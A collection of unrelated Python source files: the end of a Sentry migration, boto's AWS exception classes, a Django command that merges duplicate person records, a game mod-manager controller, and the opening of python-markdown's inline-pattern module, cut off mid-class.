'Meta': {'unique_together': "(('user', 'project', 'key'),)", 'object_name': 'UserOption'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"}),
'value': ('sentry.db.models.fields.pickle.UnicodePickledObjectField', [], {})
}
}
complete_apps = ['sentry']
|
|
# Copyright (c) 2006-2010 Mitch Garnaat http://garnaat.org/
# Copyright (c) 2010, Eucalyptus Systems, Inc.
# All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
"""
Exception classes - Subclassing allows you to check for specific errors
"""
import base64
import xml.sax
from boto import handler
from boto.resultset import ResultSet
class BotoClientError(StandardError):
"""
General Boto Client error (error accessing AWS)
"""
def __init__(self, reason, *args):
StandardError.__init__(self, reason, *args)
self.reason = reason
def __repr__(self):
return 'BotoClientError: %s' % self.reason
def __str__(self):
return 'BotoClientError: %s' % self.reason
class SDBPersistenceError(StandardError):
pass
class StoragePermissionsError(BotoClientError):
"""
Permissions error when accessing a bucket or key on a storage service.
"""
pass
class S3PermissionsError(StoragePermissionsError):
"""
Permissions error when accessing a bucket or key on S3.
"""
pass
class GSPermissionsError(StoragePermissionsError):
"""
Permissions error when accessing a bucket or key on GS.
"""
pass
class BotoServerError(StandardError):
def __init__(self, status, reason, body=None, *args):
StandardError.__init__(self, status, reason, body, *args)
self.status = status
self.reason = reason
self.body = body or ''
self.request_id = None
self.error_code = None
self.error_message = None
self.box_usage = None
# Attempt to parse the error response. If body isn't present,
# then just ignore the error response.
if self.body:
try:
h = handler.XmlHandler(self, self)
xml.sax.parseString(self.body, h)
except (TypeError, xml.sax.SAXParseException), pe:
# Remove unparsable message body so we don't include garbage
# in exception. But first, save self.body in self.error_message
# because occasionally we get error messages from Eucalyptus
# that are just text strings that we want to preserve.
self.error_message = self.body
self.body = None
def __getattr__(self, name):
if name == 'message':
return self.error_message
if name == 'code':
return self.error_code
raise AttributeError
def __repr__(self):
return '%s: %s %s\n%s' % (self.__class__.__name__,
self.status, self.reason, self.body)
def __str__(self):
return '%s: %s %s\n%s' % (self.__class__.__name__,
self.status, self.reason, self.body)
def startElement(self, name, attrs, connection):
pass
def endElement(self, name, value, connection):
if name in ('RequestId', 'RequestID'):
self.request_id = value
elif name == 'Code':
self.error_code = value
elif name == 'Message':
self.error_message = value
elif name == 'BoxUsage':
self.box_usage = value
return None
def _cleanupParsedProperties(self):
self.request_id = None
self.error_code = None
self.error_message = None
self.box_usage = None
class ConsoleOutput:
def __init__(self, parent=None):
self.parent = parent
self.instance_id = None
self.timestamp = None
self.comment = None
self.output = None
def startElement(self, name, attrs, connection):
return None
def endElement(self, name, value, connection):
if name == 'instanceId':
self.instance_id = value
elif name == 'output':
self.output = base64.b64decode(value)
else:
setattr(self, name, value)
class StorageCreateError(BotoServerError):
"""
Error creating a bucket or key on a storage service.
"""
def __init__(self, status, reason, body=None):
self.bucket = None
BotoServerError.__init__(self, status, reason, body)
def endElement(self, name, value, connection):
if name == 'BucketName':
self.bucket = value
else:
return BotoServerError.endElement(self, name, value, connection)
class S3CreateError(StorageCreateError):
"""
Error creating a bucket or key on S3.
"""
pass
class GSCreateError(StorageCreateError):
"""
Error creating a bucket or key on GS.
"""
pass
class StorageCopyError(BotoServerError):
"""
Error copying a key on a storage service.
"""
pass
class S3CopyError(StorageCopyError):
"""
Error copying a key on S3.
"""
pass
class GSCopyError(StorageCopyError):
"""
Error copying a key on GS.
"""
pass
class SQSError(BotoServerError):
"""
General Error on Simple Queue Service.
"""
def __init__(self, status, reason, body=None):
self.detail = None
self.type = None
BotoServerError.__init__(self, status, reason, body)
def startElement(self, name, attrs, connection):
return BotoServerError.startElement(self, name, attrs, connection)
def endElement(self, name, value, connection):
if name == 'Detail':
self.detail = value
elif name == 'Type':
self.type = value
else:
return BotoServerError.endElement(self, name, value, connection)
def _cleanupParsedProperties(self):
BotoServerError._cleanupParsedProperties(self)
for p in ('detail', 'type'):
setattr(self, p, None)
class SQSDecodeError(BotoClientError):
"""
Error when decoding an SQS message.
"""
def __init__(self, reason, message):
BotoClientError.__init__(self, reason, message)
self.message = message
def __repr__(self):
return 'SQSDecodeError: %s' % self.reason
def __str__(self):
return 'SQSDecodeError: %s' % self.reason
class StorageResponseError(BotoServerError):
"""
Error in response from a storage service.
"""
def __init__(self, status, reason, body=None):
self.resource = None
BotoServerError.__init__(self, status, reason, body)
def startElement(self, name, attrs, connection):
return BotoServerError.startElement(self, name, attrs, connection)
def endElement(self, name, value, connection):
if name == 'Resource':
self.resource = value
else:
return BotoServerError.endElement(self, name, value, connection)
def _cleanupParsedProperties(self):
BotoServerError._cleanupParsedProperties(self)
for p in ('resource'):
setattr(self, p, None)
class S3ResponseError(StorageResponseError):
"""
Error in response from S3.
"""
pass
class GSResponseError(StorageResponseError):
"""
Error in response from GS.
"""
pass
class EC2ResponseError(BotoServerError):
"""
Error in response from EC2.
"""
def __init__(self, status, reason, body=None):
self.errors = None
self._errorResultSet = []
BotoServerError.__init__(self, status, reason, body)
self.errors = [ (e.error_code, e.error_message) \
for e in self._errorResultSet ]
if len(self.errors):
self.error_code, self.error_message = self.errors[0]
def startElement(self, name, attrs, connection):
if name == 'Errors':
self._errorResultSet = ResultSet([('Error', _EC2Error)])
return self._errorResultSet
else:
return None
def endElement(self, name, value, connection):
if name == 'RequestID':
self.request_id = value
else:
return None # don't call subclass here
def _cleanupParsedProperties(self):
BotoServerError._cleanupParsedProperties(self)
self._errorResultSet = []
for p in ('errors'):
setattr(self, p, None)
class JSONResponseError(BotoServerError):
"""
This exception expects the fully parsed and decoded JSON response
body to be passed as the body parameter.
:ivar status: The HTTP status code.
:ivar reason: The HTTP reason message.
:ivar body: The Python dict that represents the decoded JSON
response body.
:ivar error_message: The full description of the AWS error encountered.
:ivar error_code: A short string that identifies the AWS error
(e.g. ConditionalCheckFailedException)
"""
def __init__(self, status, reason, body=None, *args):
self.status = status
self.reason = reason
self.body = body
if self.body:
self.error_message = self.body.get('message', None)
self.error_code = self.body.get('__type', None)
if self.error_code:
self.error_code = self.error_code.split('#')[-1]
class DynamoDBResponseError(JSONResponseError):
pass
class SWFResponseError(JSONResponseError):
pass
class EmrResponseError(BotoServerError):
"""
Error in response from EMR
"""
pass
class _EC2Error:
def __init__(self, connection=None):
self.connection = connection
self.error_code = None
self.error_message = None
def startElement(self, name, attrs, connection):
return None
def endElement(self, name, value, connection):
if name == 'Code':
self.error_code = value
elif name == 'Message':
self.error_message = value
else:
return None
class SDBResponseError(BotoServerError):
"""
Error in responses from SDB.
"""
pass
class AWSConnectionError(BotoClientError):
"""
General error connecting to Amazon Web Services.
"""
pass
class StorageDataError(BotoClientError):
"""
Error receiving data from a storage service.
"""
pass
class S3DataError(StorageDataError):
"""
Error receiving data from S3.
"""
pass
class GSDataError(StorageDataError):
"""
Error receiving data from GS.
"""
pass
class InvalidUriError(Exception):
"""Exception raised when URI is invalid."""
def __init__(self, message):
Exception.__init__(self, message)
self.message = message
class InvalidAclError(Exception):
"""Exception raised when ACL XML is invalid."""
def __init__(self, message):
Exception.__init__(self, message)
self.message = message
class InvalidCorsError(Exception):
"""Exception raised when CORS XML is invalid."""
def __init__(self, message):
Exception.__init__(self, message)
self.message = message
class NoAuthHandlerFound(Exception):
"""Is raised when no auth handlers were found ready to authenticate."""
pass
# Enum class for resumable upload failure disposition.
class ResumableTransferDisposition(object):
# START_OVER means an attempt to resume an existing transfer failed,
# and a new resumable upload should be attempted (without delay).
START_OVER = 'START_OVER'
# WAIT_BEFORE_RETRY means the resumable transfer failed but that it can
# be retried after a time delay within the current process.
WAIT_BEFORE_RETRY = 'WAIT_BEFORE_RETRY'
# ABORT_CUR_PROCESS means the resumable transfer failed and that
# delaying/retrying within the current process will not help. If
# resumable transfer included a state tracker file the upload can be
# retried again later, in another process (e.g., a later run of gsutil).
ABORT_CUR_PROCESS = 'ABORT_CUR_PROCESS'
# ABORT means the resumable transfer failed in a way that it does not
# make sense to continue in the current process, and further that the
# current tracker ID should not be preserved (in a tracker file if one
# was specified at resumable upload start time). If the user tries again
# later (e.g., a separate run of gsutil) it will get a new resumable
# upload ID.
ABORT = 'ABORT'
class ResumableUploadException(Exception):
"""
Exception raised for various resumable upload problems.
self.disposition is of type ResumableTransferDisposition.
"""
def __init__(self, message, disposition):
Exception.__init__(self, message, disposition)
self.message = message
self.disposition = disposition
def __repr__(self):
return 'ResumableUploadException("%s", %s)' % (
self.message, self.disposition)
class ResumableDownloadException(Exception):
"""
Exception raised for various resumable download problems.
self.disposition is of type ResumableTransferDisposition.
"""
def __init__(self, message, disposition):
Exception.__init__(self, message, disposition)
self.message = message
self.disposition = disposition
def __repr__(self):
return 'ResumableDownloadException("%s", %s)' % (
self.message, self.disposition)
class TooManyRecordsException(Exception):
"""
Exception raised when a search of Route53 records returns more
records than requested.
"""
def __init__(self, message):
Exception.__init__(self, message)
self.message = message
|
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.core.management.base import BaseCommand
from core.models import (
Person, Person2Company, Person2Country, Person2Person, Declaration)
from core.utils import ceil_date
from tasks.models import PersonDeduplication, AdHocMatch
from django.db import connection
FIELDS_TO_CONCATENATE = [
"reputation_assets_en",
"reputation_sanctions_en",
"reputation_crimes_en",
"reputation_manhunt_en",
"reputation_convictions_en",
"wiki_en",
"reputation_assets_uk",
"reputation_sanctions_uk",
"reputation_crimes_uk",
"reputation_manhunt_uk",
"reputation_convictions_uk",
"wiki_uk",
"also_known_as_uk",
"also_known_as_en",
]
FIELDS_TO_UPDATE = [
"is_pep",
"photo",
"dob",
"city_of_birth_uk",
"city_of_birth_en",
]
class Command(BaseCommand):
help = ('Takes finished tasks for persons deduplication and applies '
'to the Person model')
def add_arguments(self, parser):
# Named (optional) arguments
parser.add_argument(
'--real_run',
action='store_true',
dest='real_run',
default=False,
help='Apply deduplication results for real',
)
def handle(self, *args, **options):
def _fetch_person(task, pk):
try:
return Person.objects.get(pk=pk)
except Person.DoesNotExist:
self.stderr.write(
"\tperson with id {} doesn't exist, skipping".format(pk)
)
return None
def _delete_person(task, pk):
person = _fetch_person(task, pk)
if person:
self.stdout.write(
"\tdeleting person {} with id {}, imported={}".format(
person.full_name, person.pk, person.imported)
)
if options["real_run"]:
person.delete()
cursor = connection.cursor()
for task in PersonDeduplication.objects.filter(
applied=False).exclude(status="p"):
self.stdout.write("Task #{}:".format(task.pk))
if task.status == "a":
self.stdout.write("\tskipping")
if task.status in ["d1", "dd"]:
if task.status == "d1":
self.stdout.write(
"\tkeeping {}".format(
task.person2_id)
)
_delete_person(task, task.person1_id)
if task.status in ["d2", "dd"]:
if task.status == "d2":
self.stdout.write(
"\tkeeping {}".format(
task.person1_id)
)
_delete_person(task, task.person2_id)
if task.status == "m":
person1 = _fetch_person(task, max(task.person1_id, task.person2_id))
person2 = _fetch_person(task, min(task.person1_id, task.person2_id))
if person1 is None or person2 is None:
continue
# Round 1: fight:
if len(person1.full_name) > len(person2.full_name):
master = person1
donor = person2
self.stdout.write("\tpreferring {} over {}".format(
person1.full_name, person2.full_name))
else:
master = person2
donor = person1
self.stdout.write("\tpreferring {} over {}".format(
person2.full_name, person1.full_name))
# Transfering data fields
# Those to concatenate
for field in FIELDS_TO_CONCATENATE:
donor_val = getattr(donor, field)
master_val = getattr(master, field)
if donor_val and donor_val.strip():
setattr(master, field, ((master_val or "") + " " + donor_val).strip())
self.stdout.write("\tconcatenating content of {}".format(
field))
# Those to overwrite
for field in FIELDS_TO_UPDATE:
donor_val = getattr(donor, field)
master_val = getattr(master, field)
if donor_val and not master_val:
setattr(master, field, donor_val)
self.stdout.write("\treplacing content of {}".format(
field))
# Corner case:
if field == "dob":
if donor_val and master_val and (donor.dob_details < master.dob_details):
master.dob = donor.dob
master.dob_details = donor.dob_details
self.stdout.write("\timproving content of {} (replacing {} with {})".format(
field, master.dob, donor.dob))
if donor.reason_of_termination == None and master.reason_of_termination is not None and master.reason_of_termination != 1:
master.reason_of_termination = None
master.termination_date = None
master.termination_date_details = 0
self.stdout.write("\tResurrecting person as a pep, because donor has no termination date")
if donor.type_of_official != master.type_of_official:
self.stdout.write("\tSwitching pep level to {}".format(
donor.type_of_official))
master.type_of_official = donor.type_of_official
elif donor.reason_of_termination is not None and master.reason_of_termination is not None:
if ceil_date(donor.termination_date, donor.termination_date_details) > ceil_date(master.termination_date, master.termination_date_details):
master.termination_date = donor.termination_date
master.termination_date_details = donor.termination_date_details
self.stdout.write("\tUpdating termination date from {} to {} for a person".format(
ceil_date(donor.termination_date, donor.termination_date_details),
ceil_date(master.termination_date, master.termination_date_details)
))
elif donor.reason_of_termination is None and master.reason_of_termination is None:
# Another corner case:
if donor.type_of_official < master.type_of_official:
self.stdout.write("\tUpgrading pep level to {}".format(
donor.type_of_official))
master.type_of_official = donor.type_of_official
if options["real_run"]:
master.save()
# Merging relations with companies
for p2c in Person2Company.objects.filter(
from_person_id=donor.pk):
self.stdout.write("\tchanging link {}".format(p2c))
if options["real_run"]:
p2c.from_person = master
p2c.save()
# Merging relations with countries
for p2c in Person2Country.objects.filter(
from_person_id=donor.pk):
self.stdout.write("\tchanging link {}".format(p2c))
if options["real_run"]:
p2c.from_person = master
p2c.save()
# Merging relations with other persons
for p2p in Person2Person.objects.filter(
from_person_id=donor.pk):
self.stdout.write("\tchanging link {}".format(p2p))
if options["real_run"]:
p2p.from_person_id = master.pk
p2p.save()
for p2p in Person2Person.objects.filter(
to_person_id=donor.pk):
self.stdout.write("\tchanging link {}".format(p2p))
if options["real_run"]:
p2p.to_person_id = master.pk
p2p.save()
# Merging declarations
for decl in Declaration.objects.filter(
person=donor.pk):
if Declaration.objects.filter(
person=master.pk,
declaration_id=decl.declaration_id).count() == 0:
self.stdout.write(
"\tswitching declaration {}".format(decl))
if options["real_run"]:
decl.person = master
decl.save()
else:
decl.delete()
self.stdout.write(
"\t not switching declaration {}, deleting it".format(decl))
# TODO: Move also DeclarationExtra
self.stdout.write(
"\tkeeping {} with id {}".format(
master.pk, master.full_name)
)
self.stdout.write(
"\tdeleting {} with id {}, imported={}".format(
donor.pk, donor.full_name, donor.imported)
)
if options["real_run"]:
AdHocMatch.objects.filter(person=donor).update(person=None)
# Kill the donor!
# Raw SQL because otherwise django will also kill the old
# connections of donor person, which are stuck for some reason.
cursor.execute(
"DELETE from core_person WHERE id=%s", [donor.pk]
)
if options["real_run"]:
task.applied = True
task.save()
|
|
import sys
import os
from modPackager import ModPackager
from modManagerModel import ModManagerModel
from modManagerView import (ModManagerView, NOMODSELECTED, MODSELECTED,
EDITMOD, NEWMOD, NORMALMODES, EDITINGMODES)
class ModManagerController:
def __init__(self):
self.domain = "https://api.kag2d.com/v1"
if hasattr(sys, 'frozen'):
self.runPath = os.path.split(sys.executable)[0]
else:
self.runPath = os.path.split(sys.argv[0])[0]
if os.path.isfile(self.runPath):
self.runPath = os.path.dirname(self.runPath)
self.model = ModManagerModel(self.domain)
ModManagerView(self, self.runPath)
def get_mod_devinfo(self, username, password, developer, modname):
code, modInfo = self.model.get_mod_devinfo(username, password, developer, modname)
if code == 200:
self.view.write_log("Mod private info fetched")
self.view.set_currentMod(modInfo)
self.view.set_infofields(modInfo)
else:
self.view.write_log("Fetching mod private info failed. Reason: {reason}"
.format(reason=modInfo))
return code, modInfo
def refresh_mod_list(self):
filters, activeFilters = self.view.get_filters()
self.view.write_log("Refreshing mod list. Active filters: {filters}"
.format(filters=activeFilters))
code, modList = self.model.get_mod_list(filters)
if code == 200:
self.view.write_log("Mod list refreshed. Mods found: {mods}"
.format(mods=len(modList)))
self.view.refresh_mod_list(modList)
else:
self.view.write_log("Mod list refresh failed. Reason: {reason}"
.format(reason=modList['statusMessage']))
def new_mod(self):
username, password = self.view.dev_credentials_check("create a new mod")
if username is None:
return
self.view.new_mod()
def edit_mod(self):
username, password = self.view.dev_credentials_check("edit a mod")
if username is None:
return
code, mod = self.get_mod_devinfo(username, password,
self.view.get_mod_developer(),
self.view.get_mod_nameURL())
if code != 200:
return
self.view.edit_mod()
def submit(self):
username, password = self.view.dev_credentials_check("submit a mod")
if username is None:
return
if not self.view.submit_requiredfieldscheck():
return
name = self.view.get_mod_name()
nameURL = self.view.get_mod_nameURL()
developer = self.view.get_mod_developer()
devType = self.view.get_devType()
description = self.view.get_mod_description()
ownerList = self.view.get_mod_ownerList()
devList = self.view.get_mod_devList()
fullRestricted = self.view.get_mod_fullRestricted()
serverRestricted = self.view.get_mod_serverRestricted()
clientRestricted = self.view.get_mod_clientRestricted()
if self.view.get_viewState() == NEWMOD:
code, _ = self.model.get_mod_info(developer, nameURL)
if code != 404:
self.view.write_log("A mod with this developer and name URL already exists, please try another name URL")
return
code, message = self.model.put_mod_info(username, password,
developer=developer, devType=devType,
nameURL=nameURL, name=name, desc=description,
fullRestrict=fullRestricted,
clientRestrict=clientRestricted,
serverRestrict=serverRestricted,
ownerList=ownerList, devAccessList=devList)
if code == 200:
self.view.write_log("Mod data submitted successfully")
self.view.finish_editing()
else:
self.view.write_log("Mod data submission failed. Reason: {reason}"
.format(reason=message))
def cancel(self):
self.view.finish_editing()
def delete_mod(self):
username, password = self.view.dev_credentials_check("delete a mod")
if username is None:
return
code, message = self.model.delete_mod(username, password,
self.view.get_mod_developer(),
self.view.get_mod_nameURL())
if code == 200:
self.view.write_log("Mod deletion successful")
self.view.finish_editing()
else:
self.view.write_log("Mod deletion failed. Reason: {reason}"
.format(reason=message))
def fetch_dev_key(self):
username, password = self.view.dev_credentials_check("fetch mod developer key")
if username is None:
return 0, None
self.view.write_log("Fetching mod developer key")
code, devkey = self.model.get_mod_devkey(username, password,
self.view.get_mod_developer(),
self.view.get_mod_nameURL())
if code == 200:
self.view.write_log("Mod developer key fetched")
self.view.set_devkey(devkey)
else:
self.view.write_log("Fetching mod developer key failed. Reason: {reason}"
.format(reason=devkey))
return code, devkey
def reg_generate(self):
action = "generate a mod registration file"
username, password = self.view.dev_credentials_check(action)
if username is None:
return
if not self.view.modfolderrequiredcheck(action):
return
folderPath = self.view.get_mod_folder()
self.view.write_log("Generating mod registration file... First acquiring current mod info and devkey")
code, mod = self.get_mod_devinfo(username, password,
self.view.get_mod_developer(),
self.view.get_mod_nameURL())
if code != 200:
self.view.write_log("Mod registration file generation failed")
return
code, devkey = self.fetch_dev_key()
if code != 200:
self.view.write_log("Mod registration file generation failed")
return
self.view.write_log("Hashing mod files and generating registration file")
ModPackager.generate_regfile(folderPath, mod, devkey)
self.view.write_log("Successfully generated mod registration file")
def upload_mod(self):
action = "upload a mod package"
username, password = self.view.dev_credentials_check(action)
if username is None:
return
if not self.view.modfolderrequiredcheck(action):
return
folderPath = self.view.get_mod_folder()
self.view.write_log("Uploading mod... First acquiring current mod info and devkey")
code, modInfo = self.get_mod_devinfo(username, password,
self.view.get_mod_developer(),
self.view.get_mod_nameURL())
if code != 200:
self.view.write_log("Mod upload failed")
return
code, devkey = self.fetch_dev_key()
if code != 200:
self.view.write_log("Mod upload failed")
return
self.view.write_log("Generating mod package for upload")
tempPath = os.path.join(self.runPath, 'temp')
modTar = ModPackager.package_mod_for_upload(folderPath, tempPath,
modInfo, devkey)
self.view.write_log("Successfully generated mod package")
code, message = self.model.put_mod_package(modTar, username, password,
self.view.get_mod_developer(),
self.view.get_mod_nameURL())
if code == 200:
self.view.write_log("Successfully uploaded mod")
self.view.finish_upload()
else:
self.view.write_log("Mod upload failed. Reason: {reason}".format(reason=message))
def download_mod(self):
fullRestricted = self.view.get_mod_fullRestricted()
if fullRestricted:
username, password = self.view.dev_credentials_check("download this full mod package (it is restricted to devs only)")
if username is None:
return
else:
username = password = None
dlPath = self.view.get_download_folder()
dev = self.view.get_mod_developer()
modname = self.view.get_mod_nameURL()
self.view.write_log("Downloading mod package")
code, message = self.model.get_mod_package(dlPath, dev, modname,
fullRestricted, username, password)
if code == 200:
self.view.write_log("Successfully downloaded mod, extracting now")
modFile = os.path.join(dlPath, '{name}.tar'.format(name=modname))
extractPath = os.path.join(dlPath, '{name}'.format(name=modname))
try:
ModPackager.extract_mod(modFile, extractPath)
self.view.write_log("Successfully extracted mod")
except Exception, ex:
self.view.write_log("Mod extraction failed: {e}".format(e=ex))
else:
self.view.write_log("Mod download failed. Reason: {reason}".format(reason=message))
client = ModManagerController()
|
|
"""
INLINE PATTERNS
=============================================================================
Inline patterns such as *emphasis* are handled by means of auxiliary
objects, one per pattern. Pattern objects must be instances of classes
that extend markdown.Pattern. Each pattern object uses a single regular
expression and needs support the following methods:
pattern.getCompiledRegExp() # returns a regular expression
pattern.handleMatch(m) # takes a match object and returns
# an ElementTree element or just plain text
All of python markdown's built-in patterns subclass from Pattern,
but you can add additional patterns that don't.
Also note that all the regular expressions used by inline must
capture the whole block. For this reason, they all start with
'^(.*)' and end with '(.*)!'. In case with built-in expression
Pattern takes care of adding the "^(.*)" and "(.*)!".
Finally, the order in which regular expressions are applied is very
important - e.g. if we first replace http://.../ links with <a> tags
and _then_ try to replace inline html, we would end up with a mess.
So, we apply the expressions in the following order:
* escape and backticks have to go before everything else, so
that we can preempt any markdown patterns by escaping them.
* then we handle auto-links (must be done before inline html)
* then we handle inline HTML. At this point we will simply
replace all inline HTML strings with a placeholder and add
the actual HTML to a hash.
* then inline images (must be done before links)
* then bracketed links, first regular then reference-style
* finally we apply strong and emphasis
"""
from __future__ import absolute_import
from __future__ import unicode_literals
from . import util
from . import odict
import re
try: # pragma: no cover
from urllib.parse import urlparse, urlunparse
except ImportError: # pragma: no cover
from urlparse import urlparse, urlunparse
try: # pragma: no cover
from html import entities
except ImportError: # pragma: no cover
import htmlentitydefs as entities
def build_inlinepatterns(md_instance, **kwargs):
""" Build the default set of inline patterns for Markdown. """
inlinePatterns = odict.OrderedDict()
inlinePatterns["backtick"] = BacktickPattern(BACKTICK_RE)
inlinePatterns["escape"] = EscapePattern(ESCAPE_RE, md_instance)
inlinePatterns["reference"] = ReferencePattern(REFERENCE_RE, md_instance)
inlinePatterns["link"] = LinkPattern(LINK_RE, md_instance)
inlinePatterns["image_link"] = ImagePattern(IMAGE_LINK_RE, md_instance)
inlinePatterns["image_reference"] = ImageReferencePattern(
IMAGE_REFERENCE_RE, md_instance
)
inlinePatterns["short_reference"] = ReferencePattern(
SHORT_REF_RE, md_instance
)
inlinePatterns["autolink"] = AutolinkPattern(AUTOLINK_RE, md_instance)
inlinePatterns["automail"] = AutomailPattern(AUTOMAIL_RE, md_instance)
inlinePatterns["linebreak"] = SubstituteTagPattern(LINE_BREAK_RE, 'br')
if md_instance.safeMode != 'escape':
inlinePatterns["html"] = HtmlPattern(HTML_RE, md_instance)
inlinePatterns["entity"] = HtmlPattern(ENTITY_RE, md_instance)
inlinePatterns["not_strong"] = SimpleTextPattern(NOT_STRONG_RE)
inlinePatterns["em_strong"] = DoubleTagPattern(EM_STRONG_RE, 'strong,em')
inlinePatterns["strong_em"] = DoubleTagPattern(STRONG_EM_RE, 'em,strong')
inlinePatterns["strong"] = SimpleTagPattern(STRONG_RE, 'strong')
inlinePatterns["emphasis"] = SimpleTagPattern(EMPHASIS_RE, 'em')
if md_instance.smart_emphasis:
inlinePatterns["emphasis2"] = SimpleTagPattern(SMART_EMPHASIS_RE, 'em')
else:
inlinePatterns["emphasis2"] = SimpleTagPattern(EMPHASIS_2_RE, 'em')
return inlinePatterns
"""
The actual regular expressions for patterns
-----------------------------------------------------------------------------
"""
NOBRACKET = r'[^\]\[]*'
BRK = (
r'\[(' +
(NOBRACKET + r'(\[')*6 +
(NOBRACKET + r'\])*')*6 +
NOBRACKET + r')\]'
)
NOIMG = r'(?<!\!)'
# `e=f()` or ``e=f("`")``
BACKTICK_RE = r'(?<!\\)(`+)(.+?)(?<!`)\2(?!`)'
# \<
ESCAPE_RE = r'\\(.)'
# *emphasis*
EMPHASIS_RE = r'(\*)([^\*]+)\2'
# **strong**
STRONG_RE = r'(\*{2}|_{2})(.+?)\2'
# ***strongem*** or ***em*strong**
EM_STRONG_RE = r'(\*|_)\2{2}(.+?)\2(.*?)\2{2}'
# ***strong**em*
STRONG_EM_RE = r'(\*|_)\2{2}(.+?)\2{2}(.*?)\2'
# _smart_emphasis_
SMART_EMPHASIS_RE = r'(?<!\w)(_)(?!_)(.+?)(?<!_)\2(?!\w)'
# _emphasis_
EMPHASIS_2_RE = r'(_)(.+?)\2'
# [text](url) or [text](<url>) or [text](url "title")
LINK_RE = NOIMG + BRK + \
r'''\(\s*(<.*?>|((?:(?:\(.*?\))|[^\(\)]))*?)\s*((['"])(.*?)\12\s*)?\)'''
#  or 
IMAGE_LINK_RE = r'\!' + BRK + r'\s*\(\s*(<.*?>|([^"\)\s]+\s*"[^"]*"|[^\)\s]*))\s*\)'
# [Google][3]
REFERENCE_RE = NOIMG + BRK + r'\s?\[([^\]]*)\]'
# [Google]
SHORT_REF_RE = NOIMG + r'\[([^\]]+)\]'
# ![alt text][2]
IMAGE_REFERENCE_RE = r'\!' + BRK + '\s?\[([^\]]*)\]'
# stand-alone * or _
NOT_STRONG_RE = r'((^| )(\*|_)( |$))'
# <http://www.123.com>
AUTOLINK_RE = r'<((?:[Ff]|[Hh][Tt])[Tt][Pp][Ss]?://[^>]*)>'
# <me@example.com>
AUTOMAIL_RE = r'<([^> \!]*@[^> ]*)>'
# <...>
HTML_RE = r'(\<([a-zA-Z/][^\>]*?|\!--.*?--)\>)'
# &
ENTITY_RE = r'(&[\#a-zA-Z0-9]*;)'
# two spaces at end of line
LINE_BREAK_RE = r' \n'
def dequote(string):
"""Remove quotes from around a string."""
if ((string.startswith('"') and string.endswith('"')) or
(string.startswith("'") and string.endswith("'"))):
return string[1:-1]
else:
return string
ATTR_RE = re.compile("\{@([^\}]*)=([^\}]*)}") # {@id=123}
def handleAttributes(text, parent):
"""Set values of an element based on attribute definitions ({@id=123})."""
def attributeCallback(match):
parent.set(match.group(1), match.group(2).replace('\n', ' '))
return ATTR_RE.sub(attributeCallback, text)
"""
The pattern classes
-----------------------------------------------------------------------------
"""
class Pattern(object):
"""Base class that inline patterns subclass. """
def __init__(self, pattern, markdown_instance=None):
"""
Create an instant of an inline pattern.
Keyword arguments:
* pattern: A regular expression that matches a pattern
"""
self.pattern = pattern
self.compiled_re = re.compile("^(.*?)%s(.*)$" % pattern,
re.DOTALL | re.UNICODE)
# Api for Markdown to pass safe_mode into instance
self.safe_mode = False
if markdown_instance:
self.markdown = markdown_instance
def getCompiledRegExp(self):
""" Return a compiled regular expression. """
return self.compiled_re
def handleMatch(self, m):
"""Return a ElementTree element from the given match.
Subclasses should override this method.
Keyword arguments:
* m: A re match object containing a match of the pattern.
"""
pass # pragma: no cover
def type(self):
""" Return class name, to define pattern type """
return self.__class__.__name__
def unescape(self, text):
""" Return unescaped text given text with an inline placeholder. """
try:
stash = self.markdown.treeprocessors['inline'].stashed_nodes
except KeyError: # pragma: no cover
return text
def itertext(el): # pragma: no cover
' Reimplement Element.itertext for older python versions '
tag = el.tag
if not isinstance(tag, util.string_type) and tag is not None:
return
if el.text:
yield el.text
for e in el:
for s in itertext(e):
yield s
if e.tail:
yield e.tail
def get_stash(m):
id = m.group(1)
if id in stash:
value = stash.get(id)
if isinstance(value, util.string_type):
return value
else:
# An etree Element - return text content only
return ''.join(itertext(value))
return util.INLINE_PLACEHOLDER_RE.sub(get_stash, text)
class SimpleTextPattern(Pattern):
""" Return a simple text of group(2) of a Pattern. """
def handleMatch(self, m):
return m.group(2)
class EscapePattern(Pattern):
""" Return an escaped character. """
def handleMatch(self, m):
char = m.group(2)
if char in self.markdown.ESCAPED_CHARS:
return '%s%s%s' % (util.STX, ord(char), util.ETX)
else:
return None
class SimpleTagPattern(Pattern):
"""
Return element of type `tag` with a text attribute of group(3)
of a Pattern.
"""
def __init__(self, pattern, tag):
Pattern.__init__(self, pattern)
self.tag = tag
def handleMatch(self, m):
el = util.etree.Element(self.tag)
el.text = m.group(3)
return el
class SubstituteTagPattern(SimpleTagPattern):
""" Return an element of type `tag` with no children. """
def handleMatch(self, m):
return util.etree.Element(self.tag)
class BacktickPattern(Pattern):
""" Return a `<code>` element containing the matching text. """
def __init__(self, pattern):
Pattern.__init__(self, pattern)
self.tag = "code"
def handleMatch(self, m):
el = util.etree.Element(self.tag)
el.text = util.AtomicString(m.group(3).strip())
return el
class DoubleTagPattern(SimpleTagPattern):
"""Return a ElementTree element nested in tag2 nested in tag1.
Useful for strong emphasis etc.
"""
def handleMatch(self, m):
tag1, tag2 = self.tag.split(",")
el1 = util.etree.Element(tag1)
